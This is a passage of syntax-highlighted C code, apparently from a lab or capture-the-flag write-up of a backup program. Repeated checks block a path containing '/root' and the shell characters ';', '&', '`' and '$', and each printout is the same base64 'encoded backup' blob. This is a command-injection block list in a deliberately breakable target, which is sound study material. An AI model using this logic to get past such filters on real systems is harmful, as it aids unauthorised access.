&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="s">&amp;#34;vYauq4AUycRmLuWvPyJk3sF+HmNMciNHfFNLD3LdkGmgwSW8j50xlO6SWiH5qU1Edz340bxpSlvaKvE4hnK/oan4wWPabhw/2rwaaJSXucU+pLgZor&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="s">&amp;#34;Y67Q/Y6cfA2hLWJabgeobKjMy0njgC9c8cQDaVrfE/ZiS1S+rPgz/e2Pc3lgkQ+lAVBqjo4zmpQltgIXauCdhvlA1Pe/BXhPQBJab7NVF6Xm3207Ef&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="s">&amp;#34;D3utbrcuUuQyF+rQhDCKsAEhqQ+Yyp1Tq2o6BvWJlhtWdts7rCubeoZPDBD6Mejp3XYkbSYYbzmgr1poNqnzT5XPiXnPwVqH1fG8OSO56xAvxx2mU2&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="s">&amp;#34;EP+Yhgo4OAghyW1sgV8FxenV8p5c+u9bTBTz/7WlQDI0HUsFAOHnWBTYR4HTvyi8OPZXKmwsPAG1hrlcrNDqPrpsmxxmVR8xSRbBDLSrH14pXYKPY/&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="s">&amp;#34;a4AZKO/GtVMULlrpbpIFqZ98zwmROFstmPl/cITNYWBlLtJ5AmsyCxBybfLxHdJKHMsK6Rp4MO+wXrd/EZNxM8lnW6XNOVgnFHMBsxJkqsYIWlO0MM&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="s">&amp;#34;yU9L1CL2RRwm2QvbdD8PLWA/jp1fuYUdWxvQWt7NjmXo7crC1dA0BDPg5pVNxTrOc6lADp7xvGK/kP4F0eR+53a4dSL0b6xFnbL7WwRpcF+Ate/Ut2&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="s">&amp;#34;2WlFrg9A8gqBC8Ub1SnBU2b93ElbG9SFzno5TFmzXk3onbLaaEVZl9AKPA3sGEXZvVP+jueADQsokjJQwnzg1BRGFmqWbR6hxPagTVXBbQ+hytQdd2&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="s">&amp;#34;6PCuhmRUyNjEIBFx/XqkSOfAhLI9+Oe4FH3hYqb1W6xfZcLhpBs4Vwh7t2WGrEnUm2/F+X/OD+s9xeYniyUrBTEaOWKEv2NOUZudU6X2VOTX6QbHJr&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="s">&amp;#34;yLdSU9XLHB+nEGeq+sdtifdUGeFLct+Ee2pgR/AsSexKmzW09cx865KuxKnR3yoC6roUBb30Ijm5vQuzg/RM71P5ldpCK70RemYniiNeluBfHwQLOx&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="s">&amp;#34;kDn/8MN0CEBr1eFzkCNdblNBVA7b9m7GjoEhQXOpOpSGrXwbiHHm5C7Zn4kZtEy729ZOo71OVuT9i+4vCiWQLHrdxYkqiC7lmfCjMh9e05WEy1EBmP&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="s">&amp;#34;aFkYgxK2c6xWErsEv38++8xdqAcdEGXJBR2RT1TlxG/YlB4B7SwUem4xG6zJYi452F1klhkxloV6paNLWrcLwokdPJeCIrUbn+C9TesqoaaXASnict&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="s">&amp;#34;zNXUKzT905OFOcJwt7FbxyXk0z3FxD/tgtUHcFBLAQI/AzMDAQBjAG++IksAAAAA7QMAABgKAAAIAAsAAAAAAAAAIIC0gQAAAAByb290LnR4dAGZBw&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="s">&amp;#34;ACAEFFAQgAUEsFBgAAAAABAAEAQQAAAB4EAAAAAA==&amp;#34;&lt;/span>&lt;span class="p">);&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="nf">exit&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="mi">0&lt;/span>&lt;span class="p">);&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="p">}&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="k">if&lt;/span> &lt;span class="p">(&lt;/span> &lt;span class="nf">strstr&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="n">argv&lt;/span>&lt;span class="p">[&lt;/span>&lt;span class="mi">3&lt;/span>&lt;span class="p">],&lt;/span> &lt;span class="s">&amp;#34;/root&amp;#34;&lt;/span>&lt;span class="p">)&lt;/span> &lt;span class="p">)&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="p">{&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="nf">displaySuccess&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="s">&amp;#34;Finished! Encoded backup is below:&lt;/span>&lt;span class="se">\n&lt;/span>&lt;span class="s">&amp;#34;&lt;/span>&lt;span class="p">);&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="nf">puts&lt;/span>&lt;span class="p">(&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="s">&amp;#34;UEsDBDMDAQBjAG++IksAAAAA7QMAABgKAAAIAAsAcm9vdC50eHQBmQcAAgBBRQEIAEbBKBl0rFrayqfbwJ2YyHunnYq1Za6G7XLo8C3RH/hu0fArpS&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="s">&amp;#34;vYauq4AUycRmLuWvPyJk3sF+HmNMciNHfFNLD3LdkGmgwSW8j50xlO6SWiH5qU1Edz340bxpSlvaKvE4hnK/oan4wWPabhw/2rwaaJSXucU+pLgZor&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="s">&amp;#34;Y67Q/Y6cfA2hLWJabgeobKjMy0njgC9c8cQDaVrfE/ZiS1S+rPgz/e2Pc3lgkQ+lAVBqjo4zmpQltgIXauCdhvlA1Pe/BXhPQBJab7NVF6Xm3207Ef&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="s">&amp;#34;D3utbrcuUuQyF+rQhDCKsAEhqQ+Yyp1Tq2o6BvWJlhtWdts7rCubeoZPDBD6Mejp3XYkbSYYbzmgr1poNqnzT5XPiXnPwVqH1fG8OSO56xAvxx2mU2&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="s">&amp;#34;EP+Yhgo4OAghyW1sgV8FxenV8p5c+u9bTBTz/7WlQDI0HUsFAOHnWBTYR4HTvyi8OPZXKmwsPAG1hrlcrNDqPrpsmxxmVR8xSRbBDLSrH14pXYKPY/&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="s">&amp;#34;a4AZKO/GtVMULlrpbpIFqZ98zwmROFstmPl/cITNYWBlLtJ5AmsyCxBybfLxHdJKHMsK6Rp4MO+wXrd/EZNxM8lnW6XNOVgnFHMBsxJkqsYIWlO0MM&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="s">&amp;#34;yU9L1CL2RRwm2QvbdD8PLWA/jp1fuYUdWxvQWt7NjmXo7crC1dA0BDPg5pVNxTrOc6lADp7xvGK/kP4F0eR+53a4dSL0b6xFnbL7WwRpcF+Ate/Ut2&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="s">&amp;#34;2WlFrg9A8gqBC8Ub1SnBU2b93ElbG9SFzno5TFmzXk3onbLaaEVZl9AKPA3sGEXZvVP+jueADQsokjJQwnzg1BRGFmqWbR6hxPagTVXBbQ+hytQdd2&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="s">&amp;#34;6PCuhmRUyNjEIBFx/XqkSOfAhLI9+Oe4FH3hYqb1W6xfZcLhpBs4Vwh7t2WGrEnUm2/F+X/OD+s9xeYniyUrBTEaOWKEv2NOUZudU6X2VOTX6QbHJr&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="s">&amp;#34;yLdSU9XLHB+nEGeq+sdtifdUGeFLct+Ee2pgR/AsSexKmzW09cx865KuxKnR3yoC6roUBb30Ijm5vQuzg/RM71P5ldpCK70RemYniiNeluBfHwQLOx&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="s">&amp;#34;kDn/8MN0CEBr1eFzkCNdblNBVA7b9m7GjoEhQXOpOpSGrXwbiHHm5C7Zn4kZtEy729ZOo71OVuT9i+4vCiWQLHrdxYkqiC7lmfCjMh9e05WEy1EBmP&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="s">&amp;#34;aFkYgxK2c6xWErsEv38++8xdqAcdEGXJBR2RT1TlxG/YlB4B7SwUem4xG6zJYi452F1klhkxloV6paNLWrcLwokdPJeCIrUbn+C9TesqoaaXASnict&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="s">&amp;#34;zNXUKzT905OFOcJwt7FbxyXk0z3FxD/tgtUHcFBLAQI/AzMDAQBjAG++IksAAAAA7QMAABgKAAAIAAsAAAAAAAAAIIC0gQAAAAByb290LnR4dAGZBw&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="s">&amp;#34;ACAEFFAQgAUEsFBgAAAAABAAEAQQAAAB4EAAAAAA==&amp;#34;&lt;/span>&lt;span class="p">);&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="nf">exit&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="mi">0&lt;/span>&lt;span class="p">);&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="p">}&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="k">if&lt;/span> &lt;span class="p">(&lt;/span> &lt;span class="nf">strchr&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="n">argv&lt;/span>&lt;span class="p">[&lt;/span>&lt;span class="mi">3&lt;/span>&lt;span class="p">],&lt;/span> &lt;span class="mi">59&lt;/span>&lt;span class="p">)&lt;/span> &lt;span class="p">)&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="p">{&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="nf">displaySuccess&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="s">&amp;#34;Finished! Encoded backup is below:&lt;/span>&lt;span class="se">\n&lt;/span>&lt;span class="s">&amp;#34;&lt;/span>&lt;span class="p">);&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="nf">puts&lt;/span>&lt;span class="p">(&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="s">&amp;#34;UEsDBDMDAQBjAG++IksAAAAA7QMAABgKAAAIAAsAcm9vdC50eHQBmQcAAgBBRQEIAEbBKBl0rFrayqfbwJ2YyHunnYq1Za6G7XLo8C3RH/hu0fArpS&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="s">&amp;#34;vYauq4AUycRmLuWvPyJk3sF+HmNMciNHfFNLD3LdkGmgwSW8j50xlO6SWiH5qU1Edz340bxpSlvaKvE4hnK/oan4wWPabhw/2rwaaJSXucU+pLgZor&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="s">&amp;#34;Y67Q/Y6cfA2hLWJabgeobKjMy0njgC9c8cQDaVrfE/ZiS1S+rPgz/e2Pc3lgkQ+lAVBqjo4zmpQltgIXauCdhvlA1Pe/BXhPQBJab7NVF6Xm3207Ef&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="s">&amp;#34;D3utbrcuUuQyF+rQhDCKsAEhqQ+Yyp1Tq2o6BvWJlhtWdts7rCubeoZPDBD6Mejp3XYkbSYYbzmgr1poNqnzT5XPiXnPwVqH1fG8OSO56xAvxx2mU2&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="s">&amp;#34;EP+Yhgo4OAghyW1sgV8FxenV8p5c+u9bTBTz/7WlQDI0HUsFAOHnWBTYR4HTvyi8OPZXKmwsPAG1hrlcrNDqPrpsmxxmVR8xSRbBDLSrH14pXYKPY/&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="s">&amp;#34;a4AZKO/GtVMULlrpbpIFqZ98zwmROFstmPl/cITNYWBlLtJ5AmsyCxBybfLxHdJKHMsK6Rp4MO+wXrd/EZNxM8lnW6XNOVgnFHMBsxJkqsYIWlO0MM&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="s">&amp;#34;yU9L1CL2RRwm2QvbdD8PLWA/jp1fuYUdWxvQWt7NjmXo7crC1dA0BDPg5pVNxTrOc6lADp7xvGK/kP4F0eR+53a4dSL0b6xFnbL7WwRpcF+Ate/Ut2&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="s">&amp;#34;2WlFrg9A8gqBC8Ub1SnBU2b93ElbG9SFzno5TFmzXk3onbLaaEVZl9AKPA3sGEXZvVP+jueADQsokjJQwnzg1BRGFmqWbR6hxPagTVXBbQ+hytQdd2&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="s">&amp;#34;6PCuhmRUyNjEIBFx/XqkSOfAhLI9+Oe4FH3hYqb1W6xfZcLhpBs4Vwh7t2WGrEnUm2/F+X/OD+s9xeYniyUrBTEaOWKEv2NOUZudU6X2VOTX6QbHJr&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="s">&amp;#34;yLdSU9XLHB+nEGeq+sdtifdUGeFLct+Ee2pgR/AsSexKmzW09cx865KuxKnR3yoC6roUBb30Ijm5vQuzg/RM71P5ldpCK70RemYniiNeluBfHwQLOx&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="s">&amp;#34;kDn/8MN0CEBr1eFzkCNdblNBVA7b9m7GjoEhQXOpOpSGrXwbiHHm5C7Zn4kZtEy729ZOo71OVuT9i+4vCiWQLHrdxYkqiC7lmfCjMh9e05WEy1EBmP&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="s">&amp;#34;aFkYgxK2c6xWErsEv38++8xdqAcdEGXJBR2RT1TlxG/YlB4B7SwUem4xG6zJYi452F1klhkxloV6paNLWrcLwokdPJeCIrUbn+C9TesqoaaXASnict&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="s">&amp;#34;zNXUKzT905OFOcJwt7FbxyXk0z3FxD/tgtUHcFBLAQI/AzMDAQBjAG++IksAAAAA7QMAABgKAAAIAAsAAAAAAAAAIIC0gQAAAAByb290LnR4dAGZBw&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="s">&amp;#34;ACAEFFAQgAUEsFBgAAAAABAAEAQQAAAB4EAAAAAA==&amp;#34;&lt;/span>&lt;span class="p">);&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="nf">exit&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="mi">0&lt;/span>&lt;span class="p">);&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="p">}&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="k">if&lt;/span> &lt;span class="p">(&lt;/span> &lt;span class="nf">strchr&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="n">argv&lt;/span>&lt;span class="p">[&lt;/span>&lt;span class="mi">3&lt;/span>&lt;span class="p">],&lt;/span> &lt;span class="mi">38&lt;/span>&lt;span class="p">)&lt;/span> &lt;span class="p">)&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="p">{&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="nf">displaySuccess&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="s">&amp;#34;Finished! Encoded backup is below:&lt;/span>&lt;span class="se">\n&lt;/span>&lt;span class="s">&amp;#34;&lt;/span>&lt;span class="p">);&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="nf">puts&lt;/span>&lt;span class="p">(&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="s">&amp;#34;UEsDBDMDAQBjAG++IksAAAAA7QMAABgKAAAIAAsAcm9vdC50eHQBmQcAAgBBRQEIAEbBKBl0rFrayqfbwJ2YyHunnYq1Za6G7XLo8C3RH/hu0fArpS&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="s">&amp;#34;vYauq4AUycRmLuWvPyJk3sF+HmNMciNHfFNLD3LdkGmgwSW8j50xlO6SWiH5qU1Edz340bxpSlvaKvE4hnK/oan4wWPabhw/2rwaaJSXucU+pLgZor&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="s">&amp;#34;Y67Q/Y6cfA2hLWJabgeobKjMy0njgC9c8cQDaVrfE/ZiS1S+rPgz/e2Pc3lgkQ+lAVBqjo4zmpQltgIXauCdhvlA1Pe/BXhPQBJab7NVF6Xm3207Ef&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="s">&amp;#34;D3utbrcuUuQyF+rQhDCKsAEhqQ+Yyp1Tq2o6BvWJlhtWdts7rCubeoZPDBD6Mejp3XYkbSYYbzmgr1poNqnzT5XPiXnPwVqH1fG8OSO56xAvxx2mU2&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="s">&amp;#34;EP+Yhgo4OAghyW1sgV8FxenV8p5c+u9bTBTz/7WlQDI0HUsFAOHnWBTYR4HTvyi8OPZXKmwsPAG1hrlcrNDqPrpsmxxmVR8xSRbBDLSrH14pXYKPY/&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="s">&amp;#34;a4AZKO/GtVMULlrpbpIFqZ98zwmROFstmPl/cITNYWBlLtJ5AmsyCxBybfLxHdJKHMsK6Rp4MO+wXrd/EZNxM8lnW6XNOVgnFHMBsxJkqsYIWlO0MM&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="s">&amp;#34;yU9L1CL2RRwm2QvbdD8PLWA/jp1fuYUdWxvQWt7NjmXo7crC1dA0BDPg5pVNxTrOc6lADp7xvGK/kP4F0eR+53a4dSL0b6xFnbL7WwRpcF+Ate/Ut2&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="s">&amp;#34;2WlFrg9A8gqBC8Ub1SnBU2b93ElbG9SFzno5TFmzXk3onbLaaEVZl9AKPA3sGEXZvVP+jueADQsokjJQwnzg1BRGFmqWbR6hxPagTVXBbQ+hytQdd2&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="s">&amp;#34;6PCuhmRUyNjEIBFx/XqkSOfAhLI9+Oe4FH3hYqb1W6xfZcLhpBs4Vwh7t2WGrEnUm2/F+X/OD+s9xeYniyUrBTEaOWKEv2NOUZudU6X2VOTX6QbHJr&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="s">&amp;#34;yLdSU9XLHB+nEGeq+sdtifdUGeFLct+Ee2pgR/AsSexKmzW09cx865KuxKnR3yoC6roUBb30Ijm5vQuzg/RM71P5ldpCK70RemYniiNeluBfHwQLOx&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="s">&amp;#34;kDn/8MN0CEBr1eFzkCNdblNBVA7b9m7GjoEhQXOpOpSGrXwbiHHm5C7Zn4kZtEy729ZOo71OVuT9i+4vCiWQLHrdxYkqiC7lmfCjMh9e05WEy1EBmP&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="s">&amp;#34;aFkYgxK2c6xWErsEv38++8xdqAcdEGXJBR2RT1TlxG/YlB4B7SwUem4xG6zJYi452F1klhkxloV6paNLWrcLwokdPJeCIrUbn+C9TesqoaaXASnict&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="s">&amp;#34;zNXUKzT905OFOcJwt7FbxyXk0z3FxD/tgtUHcFBLAQI/AzMDAQBjAG++IksAAAAA7QMAABgKAAAIAAsAAAAAAAAAIIC0gQAAAAByb290LnR4dAGZBw&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="s">&amp;#34;ACAEFFAQgAUEsFBgAAAAABAAEAQQAAAB4EAAAAAA==&amp;#34;&lt;/span>&lt;span class="p">);&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="nf">exit&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="mi">0&lt;/span>&lt;span class="p">);&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="p">}&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="k">if&lt;/span> &lt;span class="p">(&lt;/span> &lt;span class="nf">strchr&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="n">argv&lt;/span>&lt;span class="p">[&lt;/span>&lt;span class="mi">3&lt;/span>&lt;span class="p">],&lt;/span> &lt;span class="mi">96&lt;/span>&lt;span class="p">)&lt;/span> &lt;span class="p">)&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="p">{&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="nf">displaySuccess&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="s">&amp;#34;Finished! Encoded backup is below:&lt;/span>&lt;span class="se">\n&lt;/span>&lt;span class="s">&amp;#34;&lt;/span>&lt;span class="p">);&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="nf">puts&lt;/span>&lt;span class="p">(&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="s">&amp;#34;UEsDBDMDAQBjAG++IksAAAAA7QMAABgKAAAIAAsAcm9vdC50eHQBmQcAAgBBRQEIAEbBKBl0rFrayqfbwJ2YyHunnYq1Za6G7XLo8C3RH/hu0fArpS&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="s">&amp;#34;vYauq4AUycRmLuWvPyJk3sF+HmNMciNHfFNLD3LdkGmgwSW8j50xlO6SWiH5qU1Edz340bxpSlvaKvE4hnK/oan4wWPabhw/2rwaaJSXucU+pLgZor&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="s">&amp;#34;Y67Q/Y6cfA2hLWJabgeobKjMy0njgC9c8cQDaVrfE/ZiS1S+rPgz/e2Pc3lgkQ+lAVBqjo4zmpQltgIXauCdhvlA1Pe/BXhPQBJab7NVF6Xm3207Ef&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="s">&amp;#34;D3utbrcuUuQyF+rQhDCKsAEhqQ+Yyp1Tq2o6BvWJlhtWdts7rCubeoZPDBD6Mejp3XYkbSYYbzmgr1poNqnzT5XPiXnPwVqH1fG8OSO56xAvxx2mU2&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="s">&amp;#34;EP+Yhgo4OAghyW1sgV8FxenV8p5c+u9bTBTz/7WlQDI0HUsFAOHnWBTYR4HTvyi8OPZXKmwsPAG1hrlcrNDqPrpsmxxmVR8xSRbBDLSrH14pXYKPY/&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="s">&amp;#34;a4AZKO/GtVMULlrpbpIFqZ98zwmROFstmPl/cITNYWBlLtJ5AmsyCxBybfLxHdJKHMsK6Rp4MO+wXrd/EZNxM8lnW6XNOVgnFHMBsxJkqsYIWlO0MM&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="s">&amp;#34;yU9L1CL2RRwm2QvbdD8PLWA/jp1fuYUdWxvQWt7NjmXo7crC1dA0BDPg5pVNxTrOc6lADp7xvGK/kP4F0eR+53a4dSL0b6xFnbL7WwRpcF+Ate/Ut2&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="s">&amp;#34;2WlFrg9A8gqBC8Ub1SnBU2b93ElbG9SFzno5TFmzXk3onbLaaEVZl9AKPA3sGEXZvVP+jueADQsokjJQwnzg1BRGFmqWbR6hxPagTVXBbQ+hytQdd2&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="s">&amp;#34;6PCuhmRUyNjEIBFx/XqkSOfAhLI9+Oe4FH3hYqb1W6xfZcLhpBs4Vwh7t2WGrEnUm2/F+X/OD+s9xeYniyUrBTEaOWKEv2NOUZudU6X2VOTX6QbHJr&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="s">&amp;#34;yLdSU9XLHB+nEGeq+sdtifdUGeFLct+Ee2pgR/AsSexKmzW09cx865KuxKnR3yoC6roUBb30Ijm5vQuzg/RM71P5ldpCK70RemYniiNeluBfHwQLOx&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="s">&amp;#34;kDn/8MN0CEBr1eFzkCNdblNBVA7b9m7GjoEhQXOpOpSGrXwbiHHm5C7Zn4kZtEy729ZOo71OVuT9i+4vCiWQLHrdxYkqiC7lmfCjMh9e05WEy1EBmP&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="s">&amp;#34;aFkYgxK2c6xWErsEv38++8xdqAcdEGXJBR2RT1TlxG/YlB4B7SwUem4xG6zJYi452F1klhkxloV6paNLWrcLwokdPJeCIrUbn+C9TesqoaaXASnict&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="s">&amp;#34;zNXUKzT905OFOcJwt7FbxyXk0z3FxD/tgtUHcFBLAQI/AzMDAQBjAG++IksAAAAA7QMAABgKAAAIAAsAAAAAAAAAIIC0gQAAAAByb290LnR4dAGZBw&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="s">&amp;#34;ACAEFFAQgAUEsFBgAAAAABAAEAQQAAAB4EAAAAAA==&amp;#34;&lt;/span>&lt;span class="p">);&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="nf">exit&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="mi">0&lt;/span>&lt;span class="p">);&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="p">}&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="k">if&lt;/span> &lt;span class="p">(&lt;/span> &lt;span class="nf">strchr&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="n">argv&lt;/span>&lt;span class="p">[&lt;/span>&lt;span class="mi">3&lt;/span>&lt;span class="p">],&lt;/span> &lt;span class="mi">36&lt;/span>&lt;span class="p">)&lt;/span> &lt;span class="p">)&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="p">{&lt;/span>
